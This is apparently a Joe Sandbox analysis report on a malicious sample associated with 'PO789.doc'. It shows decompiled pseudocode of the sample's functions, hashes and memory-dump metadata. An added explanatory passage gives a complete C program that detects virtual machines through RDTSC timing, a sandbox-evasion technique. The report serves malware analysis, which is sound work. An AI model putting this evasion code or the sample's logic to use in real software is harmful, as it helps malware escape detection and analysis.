                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                            • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                            • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                            • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                            • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                            • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                            • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                            • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                            • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                            • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                                            • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                                            • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                            			E004088E0(intOrPtr* _a4) {
                                                                            				intOrPtr _v8;
                                                                            				char _v24;
                                                                            				char _v284;
                                                                            				char _v804;
                                                                            				char _v840;
                                                                            				void* _t24;
                                                                            				void* _t31;
                                                                            				void* _t33;
                                                                            				void* _t34;
                                                                            				void* _t39;
                                                                            				void* _t50;
                                                                            				intOrPtr* _t52;
                                                                            				void* _t53;
                                                                            				void* _t54;
                                                                            				void* _t55;
                                                                            				void* _t56;
                                                                            
                                                                            				_t52 = _a4;
                                                                            				_t39 = 0; // executed
                                                                            				_t24 = E00406E30(_t52,  &_v24); // executed
                                                                            				_t54 = _t53 + 8;
                                                                            				if(_t24 != 0) {
                                                                            					E00407040( &_v24,  &_v840);
                                                                            					_t55 = _t54 + 8;
                                                                            					do {
                                                                            						E0041A100( &_v284, 0x104);
                                                                            						E0041A770( &_v284,  &_v804);
                                                                            						_t56 = _t55 + 0x10;
                                                                            						_t50 = 0x4f;
                                                                            						while(1) {
                                                                            							_t31 = E00413E00(E00413DA0(_t52, _t50),  &_v284);
                                                                            							_t56 = _t56 + 0x10;
                                                                            							if(_t31 != 0) {
                                                                            								break;
                                                                            							}
                                                                            							_t50 = _t50 + 1;
                                                                            							if(_t50 <= 0x62) {
                                                                            								continue;
                                                                            							} else {
                                                                            							}
                                                                            							goto L8;
                                                                            						}
                                                                            						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                                            						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                            						_t39 = 1;
                                                                            						L8:
                                                                            						_t33 = E00407070( &_v24,  &_v840);
                                                                            						_t55 = _t56 + 8;
                                                                            					} while (_t33 != 0 && _t39 == 0);
                                                                            					_t34 = E004070F0(_t52,  &_v24); // executed
                                                                            					if(_t39 == 0) {
                                                                            						asm("rdtsc");
                                                                            						asm("rdtsc");
                                                                            						_v8 = _t34 - 0 + _t34;
                                                                            						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                            					}
                                                                            					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                            					_t20 = _t52 + 0x31; // 0x5608758b
                                                                            					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                            					return 1;
                                                                            				} else {
                                                                            					return _t24;
                                                                            				}
                                                                            			}
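The two back-to-back `rdtsc` reads at the end of the listing above, with the difference kept in a local, are the pattern behind the report's "Tries to detect virtualization through RDTSC time measurements" signature. The following C program is an added illustration of that heuristic, not code from the PO789.doc sample or from Joe Sandbox: it takes the same two-read measurement, reduces noise by keeping the minimum over several samples, and separates the decision rule so it can be checked without timing hardware. The 1000-cycle threshold and the sample count are assumptions for illustration, not values recovered from the sample.

```c
/* Added illustration of the RDTSC timing check flagged in the report; not the
 * sample's own code. Threshold and sample count are assumptions. */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 199309L
#endif
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
/* The real counter the listing reads. */
static uint64_t read_tsc(void) { return __rdtsc(); }
#else
/* Non-x86 fallback so the example still builds elsewhere: a nanosecond clock
 * stands in for the time-stamp counter. */
static uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

/* One measurement as in the listing: two consecutive reads, keep the gap. */
uint64_t rdtsc_delta(void) {
    uint64_t a = read_tsc();
    uint64_t b = read_tsc();
    return b - a;
}

/* Interrupts and scheduling can only inflate a delta, so the minimum over n
 * samples is the least noisy estimate of what the instruction pair costs. */
uint64_t min_rdtsc_delta(int n) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < n; i++) {
        uint64_t d = rdtsc_delta();
        if (d < best) best = d;
    }
    return best;
}

/* Decision rule kept separate from the measurement. On bare metal two
 * adjacent rdtsc reads cost a few dozen cycles; when a hypervisor traps
 * rdtsc (a VM exit per read) the gap grows by orders of magnitude. */
int delta_looks_virtualized(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

int looks_virtualized(uint64_t threshold, int samples) {
    return delta_looks_virtualized(min_rdtsc_delta(samples), threshold);
}

int main(void) {
    const uint64_t threshold = 1000; /* assumption for illustration only */
    uint64_t d = min_rdtsc_delta(64);
    printf("min rdtsc delta over 64 samples: %llu -> %s\n",
           (unsigned long long)d,
           delta_looks_virtualized(d, threshold) ? "suspicious" : "bare-metal-like");
    return 0;
}
```

The heuristic is noisy in both directions: a loaded bare-metal host can exceed any fixed threshold, and a hypervisor that does not trap `rdtsc` (the common default on modern KVM and VMware) produces bare-metal-like deltas. Analysts defeating the check usually patch the comparison in the sample or run it under a hypervisor configured not to exit on `rdtsc`, rather than trying to make the counter itself look native.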
Instruction addresses for the listing above, collapsed from the per-line address column: 0x004088eb to 0x004089d7, with 0x00408906 repeated for the final lines; entries of 0x00000000 mark lines with no mapped address.

                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                            • Instruction ID: 226e528ef8d89cf76aa3651449dca84ee2c763c0567bc665b78f2505a73a72ae
                                                                            • Opcode Fuzzy Hash: 9486f5e49d764a92f151d77217a9e0cba6cb209ca71685294e9262afbb7a2405
                                                                            • Instruction Fuzzy Hash: B521F8B2D4420957CB15E6649E42AFF73AC9B50304F04057FE989A2181FA39AB498BA7
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 13 4188c0-4188f1 call 4191f0 RtlAllocateHeap
                                                                            C-Code - Quality: 100%
                                                                            			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                                            				void* _t10;
                                                                            				void* _t15;
                                                                            
                                                                            				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                            				_t6 =  &_a8; // 0x413546
                                                                            				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                                            				return _t10;
                                                                            			}

Instruction addresses for the listing above, collapsed from the per-line address column: 0x004188d7, 0x004188e2, 0x004188ed, 0x004188f1.

                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID: F5A
                                                                            • API String ID: 1279760036-683449296
                                                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
                                                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                            • Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 211 407314-407316 212 4072b2-4072bc 211->212 213 407318-407378 call 41a150 call 407290 call 4199e0 211->213 215 4072c3-4072da call 413e60 212->215 216 4072be call 409b50 212->216 229 407380-4073b2 call 40d3e0 call 418790 213->229 221 4072dc-4072ee PostThreadMessageW 215->221 222 40730e-407312 215->222 216->215 224 4072f0-40730a call 4092b0 221->224 225 40730d 221->225 224->225 225->222 235 4073b4-4073bc 229->235 236 4073e7-4073ef 229->236 237 4073d6-4073e0 235->237 238 4073be-4073c5 235->238 237->229 240 4073e2-4073e5 237->240 238->237 239 4073c7-4073ce 238->239 239->237 241 4073d0-4073d4 239->241 242 40740d-40741f call 418720 240->242 241->237 243 4073f0-40740a call 41a0d0 241->243 242->236 248 407421-40748c call 417fa0 242->248 243->242 248->236 251 407492-4074ee call 417fe0 248->251 251->236 254 4074f4-407541 call 419680 call 4196a0 call 41a3c0 call 41a0d0 call 413a60 251->254
                                                                            C-Code - Quality: 74%
                                                                            			E00407314(void* __eax, void* __ebx, intOrPtr _a8, int _a12, char* _a16) {
                                                                            				intOrPtr _v0;
                                                                            				char* _v8;
                                                                            				char* _v12;
                                                                            				char* _v132;
                                                                            				char* _v136;
                                                                            				char _v656;
                                                                            				char* _v668;
                                                                            				char _v688;
                                                                            				char* _v692;
                                                                            				intOrPtr __edi;
                                                                            				int __esi;
                                                                            				void* __ebp;
                                                                            				void* _t62;
                                                                            				int _t63;
                                                                            				void* _t67;
                                                                            				void* _t68;
                                                                            				long _t71;
                                                                            				void* _t73;
                                                                            				int _t74;
                                                                            				void* _t76;
                                                                            
                                                                            				asm("sahf");
                                                                            				_t67 = __ebx - 1;
                                                                            				_t82 = _t67;
                                                                            				if(_t67 == 0) {
                                                                            					 *((intOrPtr*)(_t67 + 0x558d0875)) =  *((intOrPtr*)(_t67 + 0x558d0875)) + _t68;
                                                                            					asm("rcl byte [edx-0x7d], 0xc6");
                                                                            					asm("sbb al, 0x56"); // executed
                                                                            					_t62 = E00409B50(_t82); // executed
                                                                            					_t63 = E00413E60(_t73, _t62, 0, 0, 0xc4e7b6d6);
                                                                            					_t74 = _t63;
                                                                            					if(_t74 != 0) {
                                                                            						_t71 = _a12;
                                                                            						_t63 = PostThreadMessageW(_t71, 0x111, 0, 0); // executed
                                                                            						_t84 = _t63;
                                                                            						if(_t63 == 0) {
                                                                            							_t63 =  *_t74(_t71, 0x8003, _t76 + (E004092B0(_t84, 1, 8) & 0x000000ff) - 0x40, _t63);
                                                                            						}
                                                                            					}
                                                                            					return _t63;
                                                                            				} else {
                                                                            					__edx = 0xcc7c7158;
                                                                            					__eflags = __al;
                                                                            					_push(__ebp);
                                                                            					_push(__ebp);
                                                                            					__ebp = __esp;
                                                                            					__esp = __esp - 0x2ac;
                                                                            					_push(__ebx);
                                                                            					_push(__esi);
                                                                            					_push(__edi);
                                                                            					__eax = 0;
                                                                            					_v12 = 0;
                                                                            					_v692 = 0;
                                                                            					 &_v688 = E0041A150( &_v688, 0, 0x2a4);
                                                                            					__esi = _a12;
                                                                            					__ecx =  *((intOrPtr*)(__esi + 0x300));
                                                                            					__edi = _v0;
                                                                            					__eax = E00407290(__ebx, __eflags, _v0,  *((intOrPtr*)(__esi + 0x300))); // executed
                                                                            					__eax = E004199E0(__ecx);
                                                                            					_t14 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                                                            					__ebx = __eax + _t14;
                                                                            					_a12 = 0;
                                                                            					while(1) {
                                                                            						__eax = E0040D3E0(__edi, 0xfe363c80); // executed
                                                                            						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                            						__eax =  &_v688;
                                                                            						__eax = E00418790(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                                                            						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                            						__eflags = __eax;
                                                                            						if(__eax < 0) {
                                                                            							break;
                                                                            						}
                                                                            						__eflags = _v656;
                                                                            						if(_v656 == 0) {
                                                                            							L13:
                                                                            							__eax = _a16;
                                                                            							__eax = _a16 + 1;
                                                                            							_a16 = __eax;
                                                                            							__eflags = __eax - 2;
                                                                            							if(__eax < 2) {
                                                                            								continue;
                                                                            							} else {
                                                                            								__ebx = _v8;
                                                                            								goto L17;
                                                                            							}
                                                                            						} else {
                                                                            							__eflags = _v668;
                                                                            							if(_v668 == 0) {
                                                                            								goto L13;
                                                                            							} else {
                                                                            								__eflags = _v136;
                                                                            								if(_v136 == 0) {
                                                                            									goto L13;
                                                                            								} else {
                                                                            									__eflags = _v132;
                                                                            									if(_v132 != 0) {
                                                                            										__eax = _a12;
                                                                            										__edx =  &_v688;
                                                                            										__ebx = 1;
                                                                            										__eax = E0041A0D0(_a12,  &_v688, 0x2a8);
                                                                            										L17:
                                                                            										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                                                            										__eax = E00418720(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                                                            										__eflags = __ebx;
                                                                            										if(__ebx == 0) {
                                                                            											break;
                                                                            										} else {
                                                                            											__edx = _v668;
                                                                            											__eax = _a12;
                                                                            											__ecx = _v136;
                                                                            											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
                                                                            											__edx =  *((intOrPtr*)(__esi + 0x2d0));
                                                                            											_t34 = __esi + 0x2e8; // 0x2e8
                                                                            											__eax = _t34;
                                                                            											 *_t34 = _v136;
                                                                            											__eax = _a12;
                                                                            											_t36 = __esi + 0x314; // 0x314
                                                                            											__ebx = _t36;
                                                                            											__ecx = 0;
                                                                            											__eax = _a12 + 0x220;
                                                                            											 *__ebx = 0x18;
                                                                            											 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                            											 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                            											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                            											 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                            											 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                            											__eax = E00417FA0(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
                                                                            											__ecx = 0;
                                                                            											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                            											__eflags = __eax;
                                                                            											if(__eax < 0) {
                                                                            												break;
                                                                            											} else {
                                                                            												__edx = _v132;
                                                                            												_t44 = __esi + 0x2e0; // 0x2e0
                                                                            												__eax = _t44;
                                                                            												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                                                            												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                                                            												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                                                            												 *((intOrPtr*)(__esi + 0x324)) = 0;
                                                                            												 *((intOrPtr*)(__esi + 0x328)) = 0;
                                                                            												_a12 = _a12 + 0x224;
                                                                            												 *((intOrPtr*)(__esi + 0x2e4)) = _v132;
                                                                            												 *__ebx = 0x18;
                                                                            												 *((intOrPtr*)(__esi + 0x2d0)) = 0x1a;
                                                                            												__eax = E00417FE0(__edi, _a12 + 0x224, 0x1a, __ebx, _t44);
                                                                            												 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                                                            												__eflags = __eax;
                                                                            												if(__eax < 0) {
                                                                            													break;
                                                                            												} else {
                                                                            													__edx = _a8;
                                                                            													 *((intOrPtr*)(__edx + 0x10)) =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                                                            													__eflags =  *((intOrPtr*)(__edx + 0x10)) + 0x200;
                                                                            													__eax = E00419680(__ecx);
                                                                            													__ebx = __eax;
                                                                            													__eax =  *((intOrPtr*)(__ebx + 0x28));
                                                                            													__eax = E0041A3C0( *((intOrPtr*)(__ebx + 0x28)));
                                                                            													__edx =  *((intOrPtr*)(__ebx + 0x28));
                                                                            													_t59 = __eax + 2; // 0x2
                                                                            													__ecx = __eax + _t59;
                                                                            													__eax =  &_v656;
                                                                            													__eax = E00413A60(__edi,  &_v656, 2, 0); // executed
                                                                            													_pop(__edi);
                                                                            													_pop(__esi);
                                                                            													_pop(__ebx);
                                                                            													__esp = __ebp;
                                                                            													_pop(__ebp);
                                                                            													return __eax;
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									} else {
                                                                            										goto L13;
                                                                            									}
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						goto L21;
                                                                            					}
                                                                            					_pop(__edi);
                                                                            					_pop(__esi);
                                                                            					__eax = 0;
                                                                            					__eflags = 0;
                                                                            					_pop(__ebx);
                                                                            					__esp = __ebp;
                                                                            					_pop(__ebp);
                                                                            					return 0;
                                                                            				}
                                                                            				L21:
			}

                                                                            0x00407314
                                                                            0x00407315
                                                                            0x00407315
                                                                            0x00407316
                                                                            0x004072b2
                                                                            0x004072b8
                                                                            0x004072bc
                                                                            0x004072be
                                                                            0x004072ce
                                                                            0x004072d3
                                                                            0x004072da
                                                                            0x004072dd
                                                                            0x004072ea
                                                                            0x004072ec
                                                                            0x004072ee
                                                                            0x0040730b
                                                                            0x0040730b
                                                                            0x0040730d
                                                                            0x00407312
                                                                            0x00407318
                                                                            0x00407318
                                                                            0x0040731d
                                                                            0x0040731f
                                                                            0x00407320
                                                                            0x00407321
                                                                            0x00407323
                                                                            0x00407329
                                                                            0x0040732a
                                                                            0x0040732b
                                                                            0x0040732c
                                                                            0x00407334
                                                                            0x00407337
                                                                            0x00407344
                                                                            0x00407349
                                                                            0x0040734c
                                                                            0x00407352
                                                                            0x00407357
                                                                            0x0040735f
                                                                            0x0040736a
                                                                            0x0040736a
                                                                            0x00407371
                                                                            0x00407380
                                                                            0x00407386
                                                                            0x0040738b
                                                                            0x00407398
                                                                            0x004073a2
                                                                            0x004073aa
                                                                            0x004073b0
                                                                            0x004073b2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004073b4
                                                                            0x004073bc
                                                                            0x004073d6
                                                                            0x004073d6
                                                                            0x004073d9
                                                                            0x004073da
                                                                            0x004073dd
                                                                            0x004073e0
                                                                            0x00000000
                                                                            0x004073e2
                                                                            0x004073e2
                                                                            0x00000000
                                                                            0x004073e2
                                                                            0x004073be
                                                                            0x004073be
                                                                            0x004073c5
                                                                            0x00000000
                                                                            0x004073c7
                                                                            0x004073c7
                                                                            0x004073ce
                                                                            0x00000000
                                                                            0x004073d0
                                                                            0x004073d0
                                                                            0x004073d4
                                                                            0x004073f0
                                                                            0x004073f8
                                                                            0x00407400
                                                                            0x00407405
                                                                            0x0040740d
                                                                            0x0040740d
                                                                            0x00407415
                                                                            0x0040741d
                                                                            0x0040741f
                                                                            0x00000000
                                                                            0x00407421
                                                                            0x00407421
                                                                            0x00407427
                                                                            0x0040742a
                                                                            0x00407430
                                                                            0x00407433
                                                                            0x00407439
                                                                            0x00407439
                                                                            0x00407440
                                                                            0x00407442
                                                                            0x00407445
                                                                            0x00407445
                                                                            0x0040744c
                                                                            0x0040744f
                                                                            0x00407456
                                                                            0x0040745c
                                                                            0x00407462
                                                                            0x00407468
                                                                            0x0040746e
                                                                            0x00407474
                                                                            0x0040747a
                                                                            0x0040747f
                                                                            0x00407484
                                                                            0x0040748a
                                                                            0x0040748c
                                                                            0x00000000
                                                                            0x00407492
                                                                            0x00407492
                                                                            0x00407495
                                                                            0x00407495
                                                                            0x0040749c
                                                                            0x004074a2
                                                                            0x004074a8
                                                                            0x004074ae
                                                                            0x004074b4
                                                                            0x004074c0
                                                                            0x004074c8
                                                                            0x004074ce
                                                                            0x004074d4
                                                                            0x004074de
                                                                            0x004074e6
                                                                            0x004074ec
                                                                            0x004074ee
                                                                            0x00000000
                                                                            0x004074f4
                                                                            0x004074f4
                                                                            0x004074fa
                                                                            0x004074fa
                                                                            0x00407500
                                                                            0x0040750d
                                                                            0x0040750f
                                                                            0x00407513
                                                                            0x00407518
                                                                            0x0040751b
                                                                            0x0040751b
                                                                            0x0040752b
                                                                            0x00407533
                                                                            0x0040753b
                                                                            0x0040753c
                                                                            0x0040753d
                                                                            0x0040753e
                                                                            0x00407540
                                                                            0x00407541
                                                                            0x00407541
                                                                            0x004074ee
                                                                            0x0040748c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004073d4
                                                                            0x004073ce
                                                                            0x004073c5
                                                                            0x00000000
                                                                            0x004073bc
                                                                            0x004073e7
                                                                            0x004073e8
                                                                            0x004073e9
                                                                            0x004073e9
                                                                            0x004073eb
                                                                            0x004073ec
                                                                            0x004073ee
                                                                            0x004073ef
                                                                            0x004073ef
                                                                            0x00000000

                                                                            APIs
                                                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_400000_medicomsh78694.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessagePostThread
                                                                            • String ID:
                                                                            • API String ID: 1836367815-0
                                                                            • Opcode ID: 4ddd6b318c0bd1f39a1f9fbaaf789a033ab5648c751740f0424a0ed5e71306ef
                                                                            • Instruction ID: dd127602d5652c05562bc5ead02e76761b3753d5f3819ca0677f952c70f24e55
                                                                            • Opcode Fuzzy Hash: 4ddd6b318c0bd1f39a1f9fbaaf789a033ab5648c751740f0424a0ed5e71306ef
                                                                            • Instruction Fuzzy Hash: 8561C470A04309AFE725DF65DC85BEB77A8AB44304F10046EF949A7281DB74B941CBAA
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 265 407290-4072da call 41a150 call 41ad30 call 409b50 call 413e60 274 4072dc-4072ee PostThreadMessageW 265->274 275 40730e-407312 265->275 276 4072f0-40730a call 4092b0 274->276 277 40730d 274->277 276->277 277->275
                                                                            C-Code - Quality: 56%
                                                                            			E00407290(void* __ebx, void* __eflags, long _a8) {
                                                                            				char _v67;
                                                                            				char _v68;
                                                                            				void* _t12;
                                                                            				intOrPtr* _t13;
                                                                            				int _t14;
                                                                            				char* _t18;
                                                                            				long _t21;
                                                                            				void* _t23;
                                                                            				intOrPtr* _t24;
                                                                            				void* _t25;
                                                                            				void* _t29;
                                                                            
                                                                            				_t29 = __eflags;
                                                                            				_v68 = 0;
                                                                            				E0041A150( &_v67, 0, 0x3f);
                                                                            				_t18 =  &_v68;
                                                                            				E0041AD30(_t18, 3);
                                                                            				 *((intOrPtr*)(__ebx + 0x558d0875)) =  *((intOrPtr*)(__ebx + 0x558d0875)) + _t18;
                                                                            				asm("rcl byte [edx-0x7d], 0xc6");
                                                                            				asm("sbb al, 0x56"); // executed
                                                                            				_t12 = E00409B50(_t29); // executed
                                                                            				_t13 = E00413E60(_t23, _t12, 0, 0, 0xc4e7b6d6);
                                                                            				_t24 = _t13;
                                                                            				if(_t24 != 0) {
                                                                            					_t21 = _a8;
                                                                            					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                            					_t31 = _t14;
                                                                            					if(_t14 == 0) {
                                                                            						_t14 =  *_t24(_t21, 0x8003, _t25 + (E004092B0(_t31, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                            					}
                                                                            					return _t14;
                                                                            				}
                                                                            				return _t13;
			}

                                                                            0x00407290
                                                                            0x0040729f
                                                                            0x004072a3
                                                                            0x004072a8
                                                                            0x004072ae
                                                                            0x004072b2
                                                                            0x004072b8
                                                                            0x004072bc
                                                                            0x004072be
                                                                            0x004072ce
                                                                            0x004072d3
                                                                            0x004072da
                                                                            0x004072dd
                                                                            0x004072ea
                                                                            0x004072ec
